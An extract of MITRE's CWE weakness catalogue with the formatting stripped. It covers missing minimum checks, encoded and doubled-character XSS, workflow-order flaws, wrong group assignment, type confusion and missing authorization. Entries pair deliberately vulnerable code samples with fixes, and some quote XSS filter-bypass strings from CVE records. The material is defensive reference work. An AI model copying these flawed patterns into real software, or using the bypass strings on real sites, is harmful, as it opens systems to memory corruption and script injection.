- 2017-11-08 - updated References, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program checks a value to ensure that it is less than or equal to a maximum, but it does not also verify that the value is greater than or equal to the minimum. - - Some programs use signed integers or floats even when their values are only expected to be positive or 0. An input validation check might assume that the value is positive, and only check for the maximum value. If the value is negative, but the code assumes that the value is positive, this can produce an error. The error may have security consequences if the negative value is used for memory allocation, array access, buffer access, etc. Ultimately, the error could lead to a buffer overflow or other type of memory corruption. - The use of a negative number in a positive-only context could have security implications for other types of resources. For example, a shopping cart might check that the user is not requesting more than 10 items, but a request for -3 items could cause the application to calculate a negative price and credit the attacker's account. - - - - - - - - - - - - - - - Signed comparison - The "signed comparison" term is often used to describe when the program uses a signed variable and checks it to ensure that it is less than a maximum value (typically a maximum buffer size), but does not verify that it is greater than 0. - - - - - Integrity - Confidentiality - Availability - Modify Application Data - Execute Unauthorized Code or Commands - An attacker could modify the structure of the message or data being sent to the downstream component, possibly injecting commands. - - - Availability - DoS: Resource Consumption (Other) - in some contexts, a negative value could lead to resource consumption. - - - Confidentiality - Integrity - Modify Memory - Read Memory - If a negative value is used to access memory, buffers, or other indexable structures, it could access memory outside the bounds of the buffer. - - - - - Implementation - Enforcement by Conversion - If the number to be used is always expected to be positive, change the variable type from signed to unsigned or size_t. - - - Implementation - Input Validation - If the number to be used could have a negative value based on the specification (thus requiring a signed value), but the number should only be positive to preserve code correctness, then include a check to ensure that the value is positive. - - - - - The following code is intended to read an incoming packet from a socket and extract one or more headers. - - DataPacket *packet;int numHeaders;PacketHeader *headers; - sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; - if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); - - The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. - - - The following code reads a maximum size and performs a sanity check on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of "short s" is forced in this particular example, short int's are frequently used within real-world code, such as code that processes structured data. - - int GetUntrustedInt () {return(0x0000FFFF);} - void main (int argc, char **argv) { - char path[256];char *input;int i;short s;unsigned int sz; - i = GetUntrustedInt();s = i;/* s is -1 so it passes the safety check - CWE-697 */if (s > 256) {DiePainfully("go away!\n");} - /* s is sign-extended and saved in sz */sz = s; - /* output: i=65535, s=-1, sz=4294967295 - your mileage may vary */printf("i=%d, s=%d, sz=%u\n", i, s, sz); - input = GetUserInput("Enter pathname:"); - /* strncpy interprets s as unsigned int, so it's treated as MAX_INT(CWE-195), enabling buffer overflow (CWE-119) */strncpy(path, input, s);path[255] = '\0'; /* don't want CWE-170 */printf("Path is: %s\n", path); - } - - This code first exhibits an example of CWE-839, allowing "s" to be a negative number. When the negative short "s" is converted to an unsigned integer, it becomes an extremely large positive integer. When this converted integer is used by strncpy() it will lead to a buffer overflow (CWE-119). - - - In the following code, the method retrieves a value from an array at a specific array index location that is given as an input parameter to the method - - int getValueFromArray(int *array, int len, int index) { - - int value; - - // check that the array index is less than the maximum - - - // length of the array - if (index < len) { - - - // get the value at the specified index of the array - value = array[index]; - } - // if array index is invalid then output error message - - - // and return value indicating error - else {printf("Value is: %d\n", array[index]);value = -1;} - return value; - } - - However, this method only verifies that the given array index is less than the maximum length of the array but does not check for the minimum value (CWE-839). This will allow a negative value to be accepted as the input array index, which will result in a out of bounds read (CWE-125) and may allow access to sensitive memory. The input array index should be checked to verify that is within the maximum and minimum range required for the array (CWE-129). In this example the if statement should be modified to include a minimum range check, as shown below. - - - ... - - // check that the array index is within the correct - - - // range of values for the array - if (index >= 0 && index < len) { - ... - - - - The following code shows a simple BankAccount class with deposit and withdraw methods. - - public class BankAccount { - - public final int MAXIMUM_WITHDRAWAL_LIMIT = 350; - - // variable for bank account balance - private double accountBalance; - - // constructor for BankAccount - public BankAccount() {accountBalance = 0;} - - // method to deposit amount into BankAccount - public void deposit(double depositAmount) {...} - - // method to withdraw amount from BankAccount - public void withdraw(double withdrawAmount) { - - if (withdrawAmount < MAXIMUM_WITHDRAWAL_LIMIT) { - - double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance; - }else {System.err.println("Withdrawal amount exceeds the maximum limit allowed, please try again...");...} - } - - // other methods for accessing the BankAccount object - ... - } - - The withdraw method includes a check to ensure that the withdrawal amount does not exceed the maximum limit allowed, however the method does not check to ensure that the withdrawal amount is greater than a minimum value (CWE-129). Performing a range check on a value that does not include a minimum check can have significant security implications, in this case not including a minimum range check can allow a negative value to be used which would cause the financial application using this class to deposit money into the user account rather than withdrawing. In this example the if statement should the modified to include a minimum range check, as shown below. - - public class BankAccount { - - public final int MINIMUM_WITHDRAWAL_LIMIT = 0;public final int MAXIMUM_WITHDRAWAL_LIMIT = 350; - ... - - // method to withdraw amount from BankAccount - public void withdraw(double withdrawAmount) { - - if (withdrawAmount < MAXIMUM_WITHDRAWAL_LIMIT &&withdrawAmount > MINIMUM_WITHDRAWAL_LIMIT) { - - ... - - - - - - - - Note that this example does not protect against concurrent access to the BankAccount balance variable, see CWE-413 and CWE-362. - While it is out of scope for this example, note that the use of doubles or floats in financial calculations may be subject to certain kinds of attacks where attackers use rounding errors to steal money. - - - - - CVE-2010-1866 - Chain: integer overflow causes a negative signed value, which later bypasses a maximum-only check, leading to heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1866 - - - CVE-2009-1099 - Chain: 16-bit counter can be interpreted as a negative value, compared to a 32-bit maximum value, leading to buffer under-write. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1099 - - - CVE-2011-0521 - Chain: kernel's lack of a check for a negative value leads to memory corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0521 - - - CVE-2010-3704 - Chain: parser uses atoi() but does not check for a negative value, which can happen on some platforms, leading to buffer under-write. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3704 - - - CVE-2010-2530 - Chain: Negative value stored in an int bypasses a size check and causes allocation of large amounts of memory. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2530 - - - CVE-2009-3080 - Chain: negative offset value to IOCTL bypasses check for maximum index, then used as an array index for buffer under-read. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3080 - - - CVE-2008-6393 - chain: file transfer client performs signed comparison, leading to integer overflow and heap-based buffer overflow. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6393 - - - CVE-2008-4558 - chain: negative ID in media player bypasses check for maximum index, then used as an array index for buffer under-read. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4558 - - - - - - - - - CWE Content Team - MITRE - 2011-03-24 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-02-18 - updated Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Description - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - - - The web application improperly neutralizes user-controlled input for executable script disguised with URI encodings. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - Implementation - Input Validation - Resolve all URIs to absolute or canonical representations before processing. - - - Implementation - Input Validation - Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - With Struts, write all data from form beans with the bean's filter attribute set to true. - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - CVE-2005-0563 - Cross-site scripting (XSS) vulnerability in Microsoft Outlook Web Access (OWA) component in Exchange Server 5.5 allows remote attackers to inject arbitrary web script or HTML via an email message with an encoded javascript: URL ("jav&#X41sc&#0010;ript:") in an IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0563 - - - CVE-2005-2276 - Cross-site scripting (XSS) vulnerability in Novell Groupwise WebAccess 6.5 before July 11, 2005 allows remote attackers to inject arbitrary web script or HTML via an e-mail message with an encoded javascript URI (e.g. "j&#X41vascript" in an IMG tag). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2276 - - - CVE-2005-0692 - Encoded script within BBcode IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0692 - - - CVE-2002-0117 - Encoded "javascript" in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0117 - - - CVE-2002-0118 - Encoded "javascript" in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0118 - - - - - XSS using Script Via Encoded URI Schemes - - - SFP24 - Tainted input to command - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Name, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - XSS using Script Via Encoded URI Schemes - Failure to Resolve Encoded URI Schemes in a Web Page - - - - The software supports a session in which more than one behavior must be performed by an actor, but it does not properly ensure that the actor performs the behaviors in the required sequence. - - By performing actions in an unexpected order, or by omitting steps, an attacker could manipulate the business logic of the software or cause it to enter an invalid state. In some cases, this can also expose resultant weaknesses. - For example, a file-sharing protocol might require that an actor perform separate steps to provide a username, then a password, before being able to transfer files. If the file-sharing server accepts a password command followed by a transfer command, without any username being provided, the software might still perform the transfer. - Note that this is different than CWE-696, which focuses on when the software performs actions in the wrong sequence; this entry is closely related, but it is focused on ensuring that the actor performs actions in the correct sequence. - Workflow-related behaviors include: - - - Steps are performed in the expected order. - Required steps are not omitted. - Steps are not interrupted. - Steps are performed in a timely fashion. - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Other - Alter Execution Logic - An attacker could cause the software to skip critical steps or perform them in the wrong order, bypassing its intended business logic. This can sometimes have security implications. - - - - - This code is part of an FTP server and deals with various commands that could be sent by a user. It is intended that a user must successfully login before performing any other action such as retrieving or listing files. - - def dispatchCommand(command, user, args): - if command == 'Login':loginUser(args)return - - - # user has requested a file - if command == 'Retrieve_file':if authenticated(user) and ownsFile(user,args):sendFile(args)return - if command == 'List_files':listFiles(args)return - - ... - - - - - - The server correctly does not send files to a user that isn't logged in and doesnt own the file. However, the server will incorrectly list the files in any directory without confirming the command came from an authenticated user, and that the user is authorized to see the directory's contents. - Here is a fixed version of the above example: - - def dispatchCommand(command, user, args): - - - ... - if command == 'List_files':if authenticated(user) and ownsDirectory(user,args):listFiles(args)return - - - ... - - - - - - - - - - CVE-2011-0348 - Bypass of access/billing restrictions by sending traffic to an unrestricted destination before sending to a restricted destination. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0348 - - - CVE-2007-3012 - Attacker can access portions of a restricted page by canceling out of a dialog. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3012 - - - CVE-2009-5056 - Ticket-tracking system does not enforce a permission setting. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5056 - - - CVE-2004-2164 - Shopping cart does not close a database connection when user restores a previous order, leading to connection exhaustion. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2164 - - - CVE-2003-0777 - Chain: product does not properly handle dropped connections, leading to missing NULL terminator (CWE-170) and segmentation fault. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0777 - - - CVE-2005-3327 - Chain: Authentication bypass by skipping the first startup step as required by the protocol. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3327 - - - CVE-2004-0829 - Chain: File server crashes when sent a "find next" request without an initial "find first." - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0829 - - - CVE-2010-2620 - FTP server allows remote attackers to bypass authentication by sending (1) LIST, (2) RETR, (3) STOR, or other commands without performing the required login steps first. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2620 - - - CVE-2005-3296 - FTP server allows remote attackers to list arbitrary directories as root by running the LIST command before logging in. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3296 - - - - - 40 - Insufficient Process Validation - - - - - - - - - - - - - - - This weakness is typically associated with business logic flaws, except when it produces resultant weaknesses. - The classification of business logic flaws has been under-studied, although exploitation of business flaws frequently happens in real-world systems, and many applied vulnerability researchers investigate them. The greatest focus is in web applications. There is debate within the community about whether these problems represent particularly new concepts, or if they are variations of well-known principles. - Many business logic flaws appear to be oriented toward business processes, application flows, and sequences of behaviors, which are not as well-represented in CWE as weaknesses related to input validation, memory management, etc. - - - - - CWE Content Team - MITRE - 2011-03-24 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software or the administrator places a user into an incorrect group. - If the incorrect group has more access or privileges than the intended group, the user might be able to bypass intended security policy to access unexpected resources or perform unexpected actions. The access-control system might not be able to detect malicious usage of this group membership. - - - - - - - - - Implementation - - - Operation - - - - - Access Control - Gain Privileges or Assume Identity - - - - - CVE-1999-1193 - Operating system assigns user to privileged wheel group, allowing the user to gain root privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1193 - - - CVE-2010-3716 - Chain: drafted web request allows the creation of users with arbitrary group membership. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3716 - - - CVE-2008-5397 - Chain: improper processing of configuration options causes users to contain unintended group memberships. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5397 - - - CVE-2007-6644 - CMS does not prevent remote administrators from promoting other users to the administrator group, in violation of the intended security model. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6644 - - - CVE-2007-3260 - Product assigns members to the root group, allowing escalation of privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3260 - - - CVE-2002-0080 - Chain: daemon does not properly clear groups before dropping privileges. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0080 - - - - - CWE Content Team - MITRE - 2011-03-24 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The program allocates or initializes a resource such as a pointer, object, or variable using one type, but it later accesses that resource using a type that is incompatible with the original type. - - When the program accesses the resource using an incompatible type, this could trigger logical errors because the resource does not have expected properties. In languages without memory safety, such as C and C++, type confusion can lead to out-of-bounds memory access. - While this weakness is frequently associated with unions when parsing data with many different embedded object types in C, it can be present in any application that can interpret the same variable or memory location in multiple ways. - This weakness is not unique to C and C++. For example, errors in PHP applications can be triggered by providing array parameters when scalars are expected, or vice versa. Languages such as Perl, which perform automatic conversion of a variable of one type when it is accessed as if it were another type, can also contain these issues. - - - - - - - - - - - - - Object Type Confusion - - - - - Implementation - - - - - Availability - Integrity - Confidentiality - Read Memory - Modify Memory - Execute Unauthorized Code or Commands - DoS: Crash, Exit, or Restart - When a memory buffer is accessed using the wrong type, it could read or write memory out of the bounds of the buffer, if the allocated buffer is smaller than the type that the code is attempting to access, leading to a crash and possibly code execution. - - - - - The following code uses a union to support the representation of different types of messages. It formats messages differently, depending on their type. - - #define NAME_TYPE 1#define ID_TYPE 2 - struct MessageBuffer{int msgType;union {char *name;int nameID;};}; - - int main (int argc, char **argv) { - struct MessageBuffer buf;char *defaultMessage = "Hello World"; - buf.msgType = NAME_TYPE;buf.name = defaultMessage;printf("Pointer of buf.name is %p\n", buf.name); - /* This particular value for nameID is used to make the code architecture-independent. If coming from untrusted input, it could be any value. */ - - buf.nameID = (int)(defaultMessage + 1);printf("Pointer of buf.name is now %p\n", buf.name);if (buf.msgType == NAME_TYPE) {printf("Message: %s\n", buf.name);}else {printf("Message: Use ID %d\n", buf.nameID);} - } - - The code intends to process the message as a NAME_TYPE, and sets the default message to "Hello World." However, since both buf.name and buf.nameID are part of the same union, they can act as aliases for the same memory location, depending on memory layout after compilation. - As a result, modification of buf.nameID - an int - can effectively modify the pointer that is stored in buf.name - a string. - Execution of the program might generate output such as: - - - Pointer of name is 10830 - Pointer of name is now 10831 - Message: ello World - - - Notice how the pointer for buf.name was changed, even though buf.name was not explicitly modified. - In this case, the first "H" character of the message is omitted. However, if an attacker is able to fully control the value of buf.nameID, then buf.name could contain an arbitrary pointer, leading to out-of-bounds reads or writes. - - - The following PHP code accepts a value, adds 5, and prints the sum. - - $value = $_GET['value'];$sum = $value + 5;echo "value parameter is '$value'<p>";echo "SUM is $sum"; - - When called with the following query string: - - - value=123 - - - the program calculates the sum and prints out: - - - SUM is 128 - - - However, the attacker could supply a query string such as: - - - value[]=123 - - - The "[]" array syntax causes $value to be treated as an array type, which then generates a fatal error when calculating $sum: - - - Fatal error: Unsupported operand types in program.php on line 2 - - - - - The following Perl code is intended to look up the privileges for user ID's between 0 and 3, by performing an access of the $UserPrivilegeArray reference. It is expected that only userID 3 is an admin (since this is listed in the third element of the array). - - my $UserPrivilegeArray = ["user", "user", "admin", "user"]; - my $userID = get_current_user_ID(); - if ($UserPrivilegeArray eq "user") {print "Regular user!\n";}else {print "Admin!\n";} - print "\$UserPrivilegeArray = $UserPrivilegeArray\n"; - - In this case, the programmer intended to use "$UserPrivilegeArray->{$userID}" to access the proper position in the array. But because the subscript was omitted, the "user" string was compared to the scalar representation of the $UserPrivilegeArray reference, which might be of the form "ARRAY(0x229e8)" or similar. - Since the logic also "fails open" (CWE-636), the result of this bug is that all users are assigned administrator privileges. - While this is a forced example, it demonstrates how type confusion can have security consequences, even in memory-safe languages. - - - - - CVE-2010-4577 - Type confusion in CSS sequence leads to out-of-bounds read. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4577 - - - CVE-2011-0611 - Size inconsistency allows code execution, first discovered when it was actively exploited in-the-wild. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0611 - - - CVE-2010-0258 - Improperly-parsed file containing records of different types leads to code execution when a memory location is interpreted as a different object than intended. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0258 - - - - - EXP39-C - Do not access a variable through a pointer of an incompatible type - Exact - - - - - - - - - This weakness is possible in any type-unsafe programming language. - - - Type confusion weaknesses have received some attention by applied researchers and major software vendors for C and C++ code. Some publicly-reported vulnerabilities probably have type confusion as a root-cause weakness, but these may be described as "memory corruption" instead. This weakness seems likely to gain prominence in upcoming years. - For other languages, there are very few public reports of type confusion weaknesses. These are probably under-studied. Since many programs rely directly or indirectly on loose typing, a potential "type confusion" behavior might be intentional, possibly requiring more manual analysis. - - - - - CWE Content Team - MITRE - 2011-05-15 - - - CWE Content Team - MITRE - 2012-05-11 - updated References - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Common_Consequences, Relationships - - - - - The web application does not filter user-controlled input for executable script disguised using doubling of the involved characters. - - - - - - - Primary - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Read Application Data - Execute Unauthorized Code or Commands - - - - - Implementation - Resolve all filtered input to absolute or canonical representations before processing. - - - Implementation - Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including tag attributes, hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended. - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - With Struts, write all data from form beans with the bean's filter attribute set to true. - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - CVE-2002-2086 - XSS using "<script". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2086 - - - CVE-2000-0116 - Encoded "javascript" in IMG tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0116 - - - CVE-2001-1157 - Extra "<" in front of SCRIPT tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157 - - - - - DOUBLE - Doubled character XSS manipulations, e.g. "<script" - - - SFP24 - Tainted input to command - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-12-13 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The software does not neutralize or incorrectly neutralizes invalid characters or byte sequences in the middle of tag names, URI schemes, and other identifiers. - Some web browsers may remove these sequences, resulting in output that may have unintended control implications. For example, the software may attempt to remove a "javascript:" URI scheme, but a "java%00script:" URI may bypass this check and still be rendered as active javascript by some browsers, allowing XSS or other attacks. - - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Availability - Read Application Data - Execute Unauthorized Code or Commands - - - - - Implementation - Output Encoding - - Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. - The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks. - - - - Implementation - Attack Surface Reduction - To help mitigate XSS attacks against the user's session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user's session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set. - Defense in Depth - - - - - CVE-2004-0595 - XSS filter doesn't filter null characters before looking for dangerous tags, which are ignored by web browsers. Multiple Interpretation Error (MIE) and validate-before-cleanse. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595 - - - - - Invalid Characters in Identifiers - - - SFP24 - Tainted input to command - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Name, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Invalid Characters in Identifiers - Failure to Sanitize Invalid Characters in Identifiers in Web Pages - - - - The software does not perform an authorization check when an actor attempts to access a resource or perform an action. - - Assuming a user with a given identity, authorization is the process of determining whether that user can access a given resource, based on the user's privileges and any permissions or other access-control specifications that apply to the resource. - When access control checks are not applied, users are able to access data or perform actions that they should not be allowed to perform. This can lead to a wide range of problems, including information exposures, denial of service, and arbitrary code execution. - - - - - - - - - - - - An access control list (ACL) represents who/what has permissions to a given object. Different operating systems implement (ACLs) in different ways. In UNIX, there are three types of permissions: read, write, and execute. Users are divided into three classes for file access: owner, group owner, and all other users where each class has a separate set of rights. In Windows NT, there are four basic types of permissions for files: "No access", "Read access", "Change access", and "Full control". Windows NT extends the concept of three types of users in UNIX to include a list of users and groups along with their associated permissions. A user can create an object (file) and assign specified permissions to that object. - - - - AuthZ - "AuthZ" is typically used as an abbreviation of "authorization" within the web application security community. It is distinct from "AuthN" (or, sometimes, "AuthC") which is an abbreviation of "authentication." The use of "Auth" as an abbreviation is discouraged, since it could be used for either authentication or authorization. - - - - - Architecture and Design - - OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. - Authorization weaknesses may arise when a single-user application is ported to a multi-user 